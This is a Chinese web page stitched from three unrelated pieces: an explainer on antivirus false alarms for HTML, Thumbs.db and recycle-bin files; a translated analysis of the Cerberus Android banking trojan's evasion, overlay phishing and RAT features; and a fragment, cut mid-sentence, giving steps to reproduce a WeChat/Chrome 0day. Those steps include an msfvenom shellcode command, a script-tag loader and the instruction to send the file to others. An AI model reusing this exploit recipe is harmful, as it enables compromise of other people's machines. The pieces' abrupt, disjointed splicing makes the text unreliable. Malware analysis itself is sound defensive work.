天小編打開電腦，桌面上突然彈出U盤中發現危險木馬文件的提示（如下圖所示）。定睛一看，原來是小編自己從edge瀏覽器導出的收藏夾html文件、回收站文件夾和數據庫文件。

明明都是一些正常的文件，為什么被提示是木馬呢？對于圖片中的文件類型，小編今天為大家詳細講解一下，希望您在遇到相同情況時能夠有所甄別。

html文件

html文件是以“.html”或“.htm”為擴展名，可以使用記事本和網頁編輯軟件打開，簡單說就是網頁。日常比較常見的，就是我們在瀏覽器中導入\導出收藏夾時，都會看到“從HTML文件導入\導出至HTML文件”。

html文件被提示木馬的情況有兩種：

①屬于殺毒軟件的誤報。這種情況無需處理。

②中了ramnit 病毒。這種病毒隱蔽性極高、感染性極強。如果你的電腦上很多看似正常的軟件都被報毒了，就要留心注意是否存在感染性病毒。

Thumbs.db文件

從Windows98開始，系統增加了圖片預覽功能，保存了圖片的文件夾下會產生一個名為“Thumbs.db”的文件。Thumbs.db文件可緩存圖像文件的格式包括：jpeg，bmp，gif，tif，pdf和htm。

Thumbs.db文件是一個數據庫，里面保存了這個目錄下所有圖像文件的縮略圖(格式為jpeg)，這個文件的體積會隨著其所在文件夾的圖片的增加而增加。

Thumbs.db絕不是病毒，它其實就是一個數據庫文件，它的作用就是用來緩存緩存圖像文件的。

而Thumb.db是yuyun病毒，一種常見的U盤病毒，用來存儲病毒腳本的文件，經過簡單加密，為了讓用戶混淆，特意取名為Thumb.db，與Thumbs.db僅僅一字之差，而且一般還加了隱藏和系統屬性。

$RECYCLE.BIN文件夾

$RECYCLE.BIN文件夾是系統重要的隱藏文件，一般存在于磁盤根目錄下。是系統“回收站”在每一個磁盤上的鏈接文件夾，用于保存磁盤上刪除的文件或者文件夾信息，我們恢復誤刪除到回收站中的文件或者文件夾時大有用處。一般我們設置顯示磁盤的隱藏文件后，才能看到它。該文件夾在win7及之前系統上名稱是Recycler，win8及之后操作系統上名稱是Recycle.bin。

$RECYCLE.BIN文件夾是正常的系統文件，不是病毒，不用刪除。

還需要注意的是，顯示隱藏文件后，磁盤根目錄下還會出現一個System Volume Information文件夾。它是NTFS格式磁盤的系統文件，漢語意思是“系統卷標信息”，用于存儲系統還原的備份信息。該文件夾如果強制刪除之后，相應磁盤就打不開了。

Recycle.bin被提示木馬的情況有兩種：

①屬于殺毒軟件的誤報。這種情況無需處理，也不需要恢復顯示。

②該文件夾下存在病毒文件。此時只需對該文件夾下的病毒文件進行查殺即可，無需將整個文件夾粉碎刪除。

免責聲明：素材源于網絡，如有侵權，請聯系刪稿。

要： [譯] Cerberus - Android 平臺新型木馬病毒

編者按

近日，一款名為“Cerberus”的安卓平臺惡意木馬對交易所等數字資產相關App構成了直接的威脅，北京鏈安第一時間跟進了這一事件。在這里，我們首先結合發現和分析該木馬的ThreatFabric發布的若干文章進行了編譯，以便各位了解該木馬的技術原理。后續，我們還將進一步從技術細節和安全防護角度進行專門的分析，讓行業對類似木馬進行更全面的認識和防范。

介紹

2019 年 6 月，ThreatFabric 分析人員發現一種名為 “Cerberus” 的新型 Android 平臺惡意軟件，它在地下論壇上提供租賃服務。其作者聲稱，在租賃開始之前，它已經被私人經營了兩年。他們還指出，它不像許多其他銀行 Trojan（特洛伊木馬）病毒一樣完全基于另一個木馬程序（例如泄露的正在轉售的 Anubis 源代碼）編寫，或至少借用其他木馬的一部分程序，其代碼完全是重新編寫的，沒有使用任何其他現有木馬程序的代碼。經過徹底的分析，可以確認 Cerberus 確實不是基于 Anubis 程序編寫的。

有關此銀行惡意軟件背后的參與者的一件有意思的事情是，他們有一個“官方”的 twitter 賬戶，專門用來發布有關此惡意軟件的促銷內容（甚至視頻）。他們還用來嘲諷 AV 社區，分享 VirusTotal（病毒分析引擎網站）的檢測截圖，甚至直接與惡意軟件研究人員溝通討論。

以下截圖顯示了他們廣告活動的推文：

其中主要提到了：

“我們總是使用加密和混淆過的版本，木馬病毒已經過了數年的發展，目前所有代碼都是重新編寫的?！?/p>

上述這種行為可以解釋為需要被關注和缺乏出租經驗。

可以肯定的是，在 Anubis 2 和 RedAlert 2 木馬的租賃結束之后，Android 平臺銀行惡意軟件業務中的差距仍然存在，這為 Cerberus 背后的參與者提供了一個快速增長業務的良好機會。

Android 銀行木馬的租賃業務

銀行木馬的租賃業務并非新鮮事，這是一個已存在的商業模式，當時基于計算機平臺的銀行惡意軟件是銀行惡意軟件的唯一形式，在幾年后以相同形式轉移到 Android 平臺。

Android 平臺銀行惡意軟件的壽命受限于其作者提供支持的意愿或惡意軟件參與者被逮捕，目前已觀察到此類型的惡意軟件生命周期為每隔幾年會出現一次，從而曝光出新型的惡意軟件系列。當每次租用的惡意軟件達到使用壽命時，其他惡意軟件參與者將有機會接管該惡意軟件的租賃市場份額。

從下圖可以看出，許多知名的 Android 平臺銀行惡意軟件的壽命通常不超過一到兩年。當該系列惡意軟件不存在時，就已經出現一種新的惡意軟件系列來填補空缺，這表明對于此類惡意軟件的需求一直存在，因此 Cerberus 有很好的生存發展空間。

在 RedAlert 2 背后的參與者決定退出惡意軟件租賃業務之后，我們發現一些市面上的 Anubis 樣本數量激增，在聽說 Anubis 背后參與者被逮捕和源代碼被泄漏之后，發現市面上的 Anubis 樣本數量也大大增加，但是使用 Anubis 的新參與者并沒有提供支持和更新。

因此，對于希望專注于執行欺詐行為而無需開發和維護僵尸網絡和 C2 結構的參與者，Cerberus 將非常有用。

規避技術分析

除了標準的動態加載和字符串混淆之外，Cerberus 還用了一種非常有意思的技術來阻止對該木馬程序的分析。

它使用設備的加速度計傳感器實現了一個簡單的計步器，用于測量被攻擊者的運動情況，這個想法簡潔有效——如果被感染設備屬于一個真實用戶，那么他遲早會發生走動行為，從而對計步器產生增量。木馬病毒使用此計步器程序激活自動化程序——如果上述計步器步數達到預先配置好的閾值數量，則認為當前運行環境是安全的。使用這種簡單的措施可有效阻止木馬程序在動態分析環境例如沙箱，以及在惡意軟件分析人員的測試設備上被運行和分析。

以下代碼片段顯示展示出了負責計步器程序驗證的邏輯：

工作原理

當惡意軟件首次在設備上啟動運行時，它將首先從應用程序抽屜中隱藏圖標。然后它會請求對應的輔助功能權限。

如截圖所示：

當用戶授予此權限后，Cerberus 通過授予自身其他權限（例如發送短信和撥打電話權限）開始進行權限濫用，無需用戶任何交互。同時它還會禁用 Google Play 保護服務（Google 在設備上預裝的防病毒解決方案），以防止未來發現或刪除木馬程序。在方便地授予自己額外的權限并確保木馬在設備上的持久性之后，Cerberus 將受感染的設備注冊在僵尸網絡中，并等待來自 C2 服務器的命令，同時還準備好執行窗口覆蓋攻擊。

下面列出了受分析的 Cerberus 樣本所支持的命令，可以看到其提供的常見自動化行為：

Cerberus 功能

Cerberus 惡意軟件具有和其他大多數 Android 平臺銀行木馬相同的功能，例如使用窗口覆蓋攻擊、短信控制和收集聯系人列表。該木馬還可以利用按鍵記錄來擴大攻擊范圍。總體而言，Cerberus 具有相當普遍的功能列表。盡管該惡意軟件是重新編寫的，但目前似乎沒有任何創新功能。例如，一些更高級的銀行木馬現在提供注入反向連接代理，錄屏甚至遠程控制等功能。

Cerberus 嵌入了如下功能，可讓自己保持在監控之下并成功實施攻擊：

• Overlaying（窗口覆蓋）: 動態 (從 C2 獲取界面劫持信息)
• 按鍵記錄
• SMS harvesting：短信列表
• SMS harvesting：短信轉發
• 手機設備信息
• 收集聯系人列表
• 收集應用程序列表
• 定位信息收集
• Overlaying（窗口覆蓋）：目標列表更新
• SMS: 短信發送
• Calls: 請求生成 USSD
• Calls: 呼叫轉移
• Remote actions：應用安裝
• Remote actions：應用啟動
• Remote actions：應用移除
• Remote actions：展示任意網頁
• Remote actions：屏幕鎖定
• Notifications：通知推送
• C2 Resilience：輔助 C2 列表
• Self-protection：隱藏應用圖標
• Self-protection：防止被移除
• Self-protection：模擬器檢測
• Architecture：模塊化

覆蓋攻擊

大多數 Android 平臺銀行木馬使用窗口覆蓋攻擊來誘騙用戶提供其個人信息（包括但不僅限于：信用卡信息、銀行憑據、郵件憑據），Cerberus 也不例外。在這種特殊情況下，該自動化程序會濫用輔助功能服務來獲取前臺應用程序的應用程序包名稱，并確定是否顯示網絡釣魚覆蓋窗口，例如如下代碼片段所示：

攻擊目標

網絡釣魚窗口覆蓋的一些示例如下圖所示。它們有兩種類型：憑據竊取程序（前面兩個）和信用卡信息抓取器（最后一個）。

附錄中提供了在市面上觀察到的明確的 30 個活躍應用目標的列表。

實際目標列表包含：

• 7 種法國銀行應用程序
• 7 種美國銀行應用程序
• 1 個日本銀行應用程序
• 15 個非銀行應用

這個不常見的目標列表可能來源于特定的客戶需求，或者是由于某些參與者重用了部分現有目標列表。

結論

盡管 Cerberus 還不夠成熟，無法提供一套 Android 平臺銀行惡意軟件完整功能【例如 RAT（remote access Trojan 遠程訪問木馬），帶有 ATS（Automated Transaction Script 自動交易腳本）的 RAT、反向連接代理、媒體錄制】或提供相近的目標列表，但對于 Cerberus 不能掉以輕心 。

由于地下社區當前缺乏維護和受支持的服務即 Android 平臺銀行惡意軟件，肯定有一個新的服務需求。Cerberus 已經有能力滿足這一需求。除了它已經擁有的功能列表以及可從租金賺取收益之外，它會不斷演變，以演變成為最強大的 Android 平臺銀行木馬。除了這些功能，預計目標列表將在不遠的將來擴展，以包含其他（銀行）應用。

目前 Cerberus 仍是一種市面上活躍的新型木馬。

附錄

樣品

下面是市面上發現的一些的 Cerberus 樣本。

列表 1：

列表 2：

目標列表

Cerberus 所針對的移動應用程序列表，共 30 個：

2020 新變種

出現在 2019 年 6 月底惡意軟件關注中的 Cerberus 銀行木馬已從 Anubis 木馬中繼承過來，目前作為主要的銀行租賃惡意軟件出現。Cerberus 提供的功能集合可以成功地從受感染設備中提取個人信息（PII），但是仍然缺少規避濫用信息和欺詐行為檢測的功能。在 2020 年 1 月中旬，Cerberus 的作者回復了一種旨在解決該問題的新變種，帶有 RAT 功能，用于在受感染的設備上執行欺詐行為。

這個 Cerberus 新變種進行了代碼重構并更新了 C2 通信協議，但值得注意的是，它具有 RAT 功能，增強了從設備竊取屏幕滑動鎖憑據（PIN 或解鎖圖案）和來自 Google Authenticator 應用程序的 2FA 令牌的可能性。

RAT 服務能夠遍歷設備的文件系統并上載文件內容。最重要的是，它還可以啟動 TeamViewer 并建立與其的連接，為惡意軟件參與者提供對設備的遠程訪問功能。

TeamViewer 開始工作后，它將為惡意軟件參與者提供更多可能性，包括更改設備定位信息、安裝或卸載應用，最需要注意的是它可以使用設備上的任何應用程序（例如銀行應用、Messenger 和社交網絡應用）。如果被用于間諜活動它還可以提供對被感染者習慣和行為的深度分析。

以下代碼展示了負責 TeamViewer 登陸和初始啟動的邏輯：

通過簡單的窗口覆蓋來破解受感染設備的屏幕鎖定憑據（PIN 或鎖屏圖案），使受害者解鎖設備。從 RAT 的實現中，我們可以得出結論，盜竊屏幕鎖定憑據是為了使參與者能夠遠程解鎖設備，以便在受害者未使用設備時進行欺詐行為。這再次證實了犯罪分子對于制造有效木馬的創造力。

通過輔助功能服務提供的能力，木馬現在還可以從 Google Authenticator 應用程序中竊取 2FA 代碼。當應用程序運行時，木馬程序可以獲取設備窗口的內容并將其發送到 C2 服務器。還有，我們可以推斷出該功能將用于繞過依賴 OTP（One Time Password 一次性密碼） 代碼的身份驗證服務。

這是 Google Authenticator 應用程序界面的示例：

截止到 2020 年 2 月底，地下論壇尚未發布有關這些功能的廣告。因此，我們認為 Cerberus 的新變種仍處于測試階段，但有很快發布的可能性。Cerberus 擁有包括來自世界各地的機構在內的詳細目標清單，再加上其新增的 RAT 功能，對于提供在線金融服務的金融機構來說是一個重大風險。無論是否在目標列表中，惡意軟件的運營人員都可以輕松地擴充列表以定位到其他應用程序。

有關當前樣本和目標列表，請參考下面的最新樣本和目標列表。

最新樣本

最新目標列表

引用

原文：https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html

原文：https://www.threatfabric.com/blogs/2020yearoftherat.html

（1、 內容來自鏈得得內容開放平臺“得得號”，稿件內容僅代表作者觀點，不代表鏈得得官方立場。2、 凡“得得號”文章，原創性和內容的真實性由投稿人保證，如果稿件因抄襲、作假等行為導致的法律后果，由投稿人本人負責。3、 得得號平臺發布文章，如有侵權、違規及其他不當言論內容，請廣大讀者監督，一經證實，平臺會立即下線。如遇文章內容問題，請發送至郵箱：chengyiniu@chaindd.com）

個漏洞其實就是我前幾天在微頭條上發的chome 0day息息相關。微信內置瀏覽器就是chome的內核，并且默認打開了沙盒模式。簡單來復現一下：

一、生成運行計算器的shellcode

kali下：msfvenom -f csharp -a x86 --platform windows -o calc.csharp -p windows/exec CMD=calc.exe

二、替換exp里的shellcode，圖中有js地址

三、創建一個 html 文件調用 js

<script src="wx.js"></script>  test

四、微信里發給別人就可以了

測試截圖

請盡快升級。好像是微信已經強制更新了，但在win10應用商店的wechat沒有強制更新。